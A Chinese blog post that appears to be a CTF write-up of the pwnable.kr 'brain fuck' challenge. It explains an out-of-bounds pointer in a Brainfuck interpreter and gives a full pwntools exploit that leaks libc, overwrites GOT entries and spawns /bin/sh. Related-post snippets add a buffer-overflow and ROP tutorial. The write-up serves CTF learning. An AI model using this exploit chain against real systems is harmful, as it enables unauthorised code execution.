pwnable.kr - brain fuck

最新推荐文章于 2024-08-20 18:06:53 发布
原创 最新推荐文章于 2024-08-20 18:06:53 发布 · 981 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwnable.kr #brainfuck

本文介绍了一道名为Brainfuck的pwn题目的解题思路。题目利用Brainfuck语言解释器中的任意读写漏洞,通过覆写GOT表来泄露函数地址并最终获得shell。文章详细展示了如何构造payload来实现这一目标。

题目简介

Brain fuck 是 pwnable.kr 第二阶段的第一道题,考察了覆些 GOT 表等知识点。题目信息如下:

题目信息

分析

将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。

main 函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  size_t i; // [esp+28h] [ebp-40Ch]
  char s[1024]; // [esp+2Ch] [ebp-408h]
  unsigned int v6; // [esp+42Ch] [ebp-8h]

  v6 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  p = (int)&tape;
  puts("welcome to brainfuck testing system!!");
  puts("type some brainfuck instructions except [ ]");
  memset(s, 0, 0x400u);
  fgets(s, 1024, stdin);
  for ( i = 0; i < strlen(s); ++i )
    do_brainfuck(s[i]);
  return 0;
}

do_brainfuck 函数如下:

int __cdecl do_brainfuck(char a1)
{
  int result; // eax
  _BYTE *v2; // ebx

  result = a1;
  switch ( a1 )
  {
    case 43:
      result = p;
      ++*(_BYTE *)p;
      break;
    case 44:
      v2 = (_BYTE *)p;
      result = getchar();
      *v2 = result;
      break;
    case 45:
      result = p;
      --*(_BYTE *)p;
      break;
    case 46:
      result = putchar(*(char *)p);
      break;
    case 60:
      result = p-- - 1;
      break;
    case 62:
      result = p++ + 1; 
      break;
    case 91:
      result = puts("[ and ] not supported.");
      break;
    default:
      return result;
  }
  return result;
}

分析 do_brainfuck 函数可知,该函数实现了一个 brainfuck 语言的解释器,但是存在任意读写漏洞。因为 tape 在 bss 段,地址为 0x0804A0A0,与 GOT 表 相邻。因此通过控制 p 的值,可以实现对 GOT 表的任意读写。

GOT 表如下:

.got.plt:0804A000 ; ===========================================================================
.got.plt:0804A000
.got.plt:0804A000 ; Segment type: Pure data
.got.plt:0804A000 ; Segment permissions: Read/Write
.got.plt:0804A000 _got_plt        segment dword public 'DATA' use32
.got.plt:0804A000                 assume cs:_got_plt
.got.plt:0804A000                 ;org 804A000h
.got.plt:0804A000 _GLOBAL_OFFSET_TABLE_ dd offset _DYNAMIC
.got.plt:0804A004 dword_804A004   dd 0                    ; DATA XREF: sub_8048430↑r
.got.plt:0804A008 ; int (*dword_804A008)(void)
.got.plt:0804A008 dword_804A008   dd 0                    ; DATA XREF: sub_8048430+6↑r
.got.plt:0804A00C off_804A00C     dd offset getchar       ; DATA XREF: _getchar↑r
.got.plt:0804A010 off_804A010     dd offset fgets         ; DATA XREF: _fgets↑r
.got.plt:0804A014 off_804A014     dd offset __stack_chk_fail
.got.plt:0804A014                                         ; DATA XREF: ___stack_chk_fail↑r
.got.plt:0804A018 off_804A018     dd offset puts          ; DATA XREF: _puts↑r
.got.plt:0804A01C off_804A01C     dd offset __gmon_start__
.got.plt:0804A01C                                         ; DATA XREF: ___gmon_start__↑r
.got.plt:0804A020 off_804A020     dd offset strlen        ; DATA XREF: _strlen↑r
.got.plt:0804A024 off_804A024     dd offset __libc_start_main
.got.plt:0804A024                                         ; DATA XREF: ___libc_start_main↑r
.got.plt:0804A028 off_804A028     dd offset setvbuf       ; DATA XREF: _setvbuf↑r
.got.plt:0804A02C off_804A02C     dd offset memset        ; DATA XREF: _memset↑r
.got.plt:0804A030 off_804A030     dd offset putchar       ; DATA XREF: _putchar↑r
.got.plt:0804A030 _got_plt        ends
.got.plt:0804A030

具体解题思路是,首先控制 p 的值泄露出 puts 的地址,从而求得 gets 以及 system 的地址(题目给出了 so 文件)。然后改写 putchar 的 got 表项为 main 函数地址,改写 memset 的 got 表项为 gets 地址,改写 fgets 的 got 表项为 system 地址。接着再次进入 main 函数(通过改写后的 putchar),通过 gets(即改写后的 memset)读入 /bin/sh,最后调用 system(即改写后的 fgets)。

writeup

from pwn import *

context(os='linux', arch='i386', log_level='info')

DEBUG = 0
if DEBUG:
    p = process('./bf')
    so = ELF('/lib32/libc.so.6')
else:
    p = remote('pwnable.kr', 9001)
    so = ELF('./bf_libc.so')

ins =  0x88 * '<' + '.>.>.>.>'   # get puts_addr
ins += 0x14 * '>' + ',>,>,>,>'   # change putchar_got to main
ins += 0x8  * '<' + ',>,>,>,>'   # change memset_got to gets
ins += 0x20 * '<' + ',>,>,>,>'   # change fgets_got to system
ins += '.'  # return to main

# print ins

p.recvuntil('[ ]\n')
p.sendline(ins)

leak1 = p.recv(1)
leak = leak1 + p.recv(3)
puts_addr = u32(leak)
log.info('puts_addr = ' + hex(puts_addr))

gets_addr = puts_addr + (so.symbols['gets'] - so.symbols['puts'])
log.info('gets_addr = ' + hex(gets_addr))
system_addr = puts_addr + (so.symbols['system'] - so.symbols['puts'])
log.info('system_addr = ' + hex(system_addr))

main_addr = 0x8048671

shellcode = p32(main_addr) + p32(gets_addr) + p32(system_addr) + '/bin/sh\x00'
p.sendline(shellcode)

p.interactive()
pwnable.kr】0x05-passcode Writeup
weixin_64667536的博客
08-30 565
Ubuntu-SSH连接根据目录信息拉取文件。
pwnable.kr】0x02-collision Writeup
weixin_64667536的博客
08-20 506
拉取文件分析源码阅读源码后,执行样例测试输入2个参数1个参数,程序输出如下。
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3201
终于打到第二关了... 这题考察GOT覆写
pwnable.krbrainfuck
weixin_30530523的博客
08-03 233
pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownload : http://pwnable.kr/bin/bf_libc.so Running at : nc pwnable.kr 9001 =======================...
Brainfuck:一个简单的 Brainfuck JS 解释器
07-23
脑残 一个简单的 Brainfuck JS 解释器 什么是脑筋急转弯? “Brainfuck 是一种以极简主义着称的深奥编程语言。该语言仅由八个简单的命令和一个指令指针组成。然而,它被证明是图灵完备的。它旨在挑战和娱乐程序员,而不是被制造出来适合实际使用。它由 Urban Müller 于 1993 年创建。该语言的名称是对粗俗术语“brain fuck”的引用,它指的是非常复杂或不寻常的事情,以至于超出了人们的理解范围”( )。 命令是什么? 脑残 C > ++ptr; < --ptr; + ++*ptr; - --*ptr; [ 而 (*ptr) { ] } . putchar(*ptr); , *ptr = getchar();
pwnable.kr brain fuck
r250414958的博客
05-03 402
老样子,先审题 给了两个文件,先下下来 bf拖ida里康康,使用F5大法 int __cdecl main(int argc, const char **argv, const char **envp) { size_t i; // [esp+28h] [ebp-40Ch] char s[1024]; // [esp+2Ch] [ebp-408h] unsigned int v6; ...
pwnable brain fuck(bss段的用途)
九层台
09-26 750
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
pwnablebrainfuck
pwd_3的博客
09-29 534
问题分析程序没有对p的访问空间做限制,导致可以任意内存读写,在.bss段前面是存放got的地方。基本思路是:先读取got中的值泄露libc地址,再根据bf_libc.so计算其他函数偏移。接下来是写,覆盖原有got值为指定函数地址来getshell遇到问题最开始想覆盖putchar的got值为system的地址,但无法控制system的参数。思维僵化 真的是,怎么就没想到覆盖成__start的地址,
pwnable.kr brainfuck writeup
jmp esp
03-28 1853
题目I made a simple brain-fuck language emulation program written in C. The [ ] commands are not implemented yet. However the rest functionality seems working fine. Find a bug and exploit it to get a
pwnable.kr】0x01-fd Writeup
weixin_64667536的博客
08-20 347
Ubuntu连接靶机(连不通的可以试一下proxychains)scp命令拷贝下fd源码文件。
Brain-Fuck:只是一个剧本
03-11
脑干- 只是一个脚本:P 钥匙 描述 , 获得输入字符。 。 打印数据字符。 ` 通过将每个字符的asci代码设置在“图形”下方来获取输入字符串。 < 将头/指针向左移动。 > 向右移动头/指针。 伏特 向下移动头/指针。 ^ 将头/指针向上移动。 [ 循环遍历代码,直到当前头/指针的数据为0。 ] 循环结束。 -- 从当前表头/指针的数据中减去1,则为0,然后将其变为255。 + 将1添加到当前表头的数据/指针的数据,即255,然后将其变为0。 程式码范例 V\`[.^] 这将得到一个字符串并向后打印出来! V\`[^][.V] 这做同样的事情,但可以正常打印!
简单的brainfuck解码工具
06-15
简单的brainfuck解码工具,将brainfuck编码输入即可获得明文。
pwnable.kr做题笔记(一)
has_zaoganmaqule的博客
08-12 2106
调用 `printf` 函数,`bl` 指令用于分支并链接,保存返回地址到链接寄存器 `lr`。- 将 `r4`, `r11`, 和 `lr` 寄存器的值压入栈中,用于保存函数调用前的状态。- 将 `r3` 的值(0)存储到 `r11` 指向的位置的偏移量 -16 处。- 如果 `r2` 和 `r3` 不相等,跳转到 `0x8da8` 地址处。- 调用 `scanf` 函数,`r0` 和 `r1` 作为参数传递。- 从 `r11` 指向的位置的偏移量 -16 处加载值到 `r3`。
pwnable.kr题解之uaf
Yale的博客
06-19 761
前言: 这道题目反应了uaf的基本原理,pwn入门必做的题目,如果这一块了解的不够透彻,直接去打现在涉及各种奇技淫巧的pwn,肯定会被绕晕掉。所以为了照顾萌新(其实是我自己菜)把这道题目单独拿出来写一下。 这是一道uaf的题目,把二进制文件拉到本地来研究 在分析前,先简单说一下c++的虚函数和uaf的前置知识 在c++中,如果类中有虚函数,那么这个类就会有一个虚函数表的指针vfptr,而子类会继承。 uaf的原理: 在释放内存后未将指向原内存的指针置为null,use after free的意思就是在释
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 444
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
brain_fuck
jiuweideqixu的博客
08-23 642
bss段和got.plt段之间的距离为:A0A0-A030=0x70=112。 main函数 int __cdecl main(int argc, const char **argv, const char **envp) { size_t i; // [esp+28h] [ebp-40Ch] char s[1024]; // [esp+2Ch] [ebp-408h] unsigned int v6; // [esp+42Ch] [ebp-8h] v6 = __read...
pwnable.krbrain f**k
Jason_ZhouYetao的博客
07-31 383
这个问题还是很有趣的东西,这题是pwnable.kr中的第一题拥有libc库的题目; 首先说一下libc库作用,libc库的作用就是保存了可以用的函数,libc库提供C语言中所使用的宏,类型的定义,字符串操作符,数学计算函数以及输入输出函数等。正如ANSI C是C语言的标准一样,libc只是一个函数库标准,每个操作系统都会按照该标准对标准库进行具体实现。通常我们所说的libc是特指某个操作系统的...
【资源总结】Brainfuck
Birdcage
04-21 1344
一开始接触这个语言是……我在查“有哪些有趣的语言”的时候。 虽然现在还没掌握编译原理……希望我有一天也可以成为有趣的技术宅吧? 好了切入正题(没有正题) 一篇比较好的入门介绍 https://gist.github.com/roachhd/dce54bec8ba55fb17d3a 在线编译 https://copy.sh/brainfuck/ 以及最近查资料的时候发现的这个语言的OJ https:...
brainfuck 一览
AdenDeng的专栏
10-21 856
This is My Experience of Using brainfuck for 30 Minutes A Quick Introduction According to wikipedia: “Brainfuck is an esoteric programming language noted for its extreme minimalism. The language
pwnable.kr bof
最新发布
09-16
### pwnable.kr bof题目概述 pwnable.kr 是一个著名的在线渗透测试练习平台,bof(Buffer Overflow,缓冲区溢出)题目是其中经典类型。缓冲区溢出通常是由于程序没有正确检查用户输入的长度,导致输入的数据超出了缓冲区的边界,从而覆盖相邻的内存区域,可能改变程序的执行流程。 ### 解题思路与步骤 #### 1. 环境准备 首先需要在本地搭建好调试环境,安装必要的工具,如`gdb`(GNU调试器)、`pwntools`(Python 库,用于编写漏洞利用脚本)等。例如,使用`pwntools`可以方便地与远程服务器进行交互。 ```python from pwn import * # 连接到远程服务器 p = remote('pwnable.kr', 9000) ``` #### 2. 分析程序 - **反汇编**:使用`objdump`或`gdb`对目标程序进行反汇编,查看程序的汇编代码,了解程序的逻辑和函数调用关系。例如,使用`objdump -d bof`可以得到程序的反汇编代码。 - **检查漏洞点**:重点关注程序中存在缓冲区操作的函数,如`gets`、`strcpy`等,这些函数通常不检查输入的长度,容易引发缓冲区溢出漏洞。 #### 3. 确定缓冲区大小 通过调试程序,向程序输入不同长度的数据,观察程序的行为,确定缓冲区的大小。可以使用`gdb`设置断点,在关键位置查看栈的状态。 ```python # 构造不同长度的测试数据 test_data = 'A' * 10 p.sendline(test_data) ``` #### 4. 覆盖返回地址 当确定了缓冲区大小后,构造恶意输入,覆盖程序的返回地址。返回地址是函数调用结束后程序要跳转执行的地址,通过覆盖它可以改变程序的执行流程。 ```python # 计算返回地址的偏移量 offset = 44 # 假设偏移量为 44 # 构造恶意输入 payload = 'A' * offset # 获取目标地址(如系统函数地址) target_address = p64(0xdeadbeef) payload += target_address p.sendline(payload) ``` #### 5. 利用漏洞执行任意代码 - **调用系统函数**:如果程序中存在可利用的系统函数(如`system`),可以通过覆盖返回地址,将程序的执行流程引导到这些函数上,并传入合适的参数(如`/bin/sh`),从而获得一个 shell。 - **ROP 链**:如果程序中没有合适的系统函数可以直接调用,可以使用 ROP(Return Oriented Programming,面向返回编程)技术,通过拼接多个小的代码片段(gadget)来实现复杂的功能。 ```python # 构造 ROP 链 rop = ROP(elf) # 查找合适的 gadget pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] bin_sh = next(elf.search(b'/bin/sh')) system_addr = elf.symbols['system'] # 构造 ROP 链 rop.raw(pop_rdi) rop.raw(bin_sh) rop.raw(system_addr) # 构造最终的 payload payload = 'A' * offset + str(rop) p.sendline(payload) ``` ### 技术分析 #### 缓冲区溢出原理 缓冲区溢出是由于程序对输入数据的长度没有进行有效的检查,导致输入的数据超出了缓冲区的边界,覆盖了相邻的内存区域。在栈上,函数调用时会保存返回地址等信息,当缓冲区溢出发生时,返回地址可能被覆盖,从而改变程序的执行流程。 #### 栈布局与内存管理 了解栈的布局对于利用缓冲区溢出漏洞至关重要。栈是一种后进先出的数据结构,函数调用时会在栈上分配空间,保存局部变量、参数和返回地址等信息。通过调试和分析栈的状态,可以确定缓冲区的位置和返回地址的偏移量。 #### 保护机制绕过 现代操作系统和编译器通常会采用一些保护机制,如 ASLR(地址空间布局随机化)、Canary(栈保护)等,来防止缓冲区溢出漏洞的利用。在解题过程中,需要了解这些保护机制,并寻找相应的绕过方法。例如,对于 ASLR,可以通过泄露程序的基地址来绕过;对于 Canary,可以通过泄露 Canary 的值来绕过。 ### 总结 解决 pwnable.kr 的 bof 题目需要掌握缓冲区溢出的基本原理、调试技巧和漏洞利用技术。通过不断地练习和实践,可以提高对漏洞的分析和利用能力。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值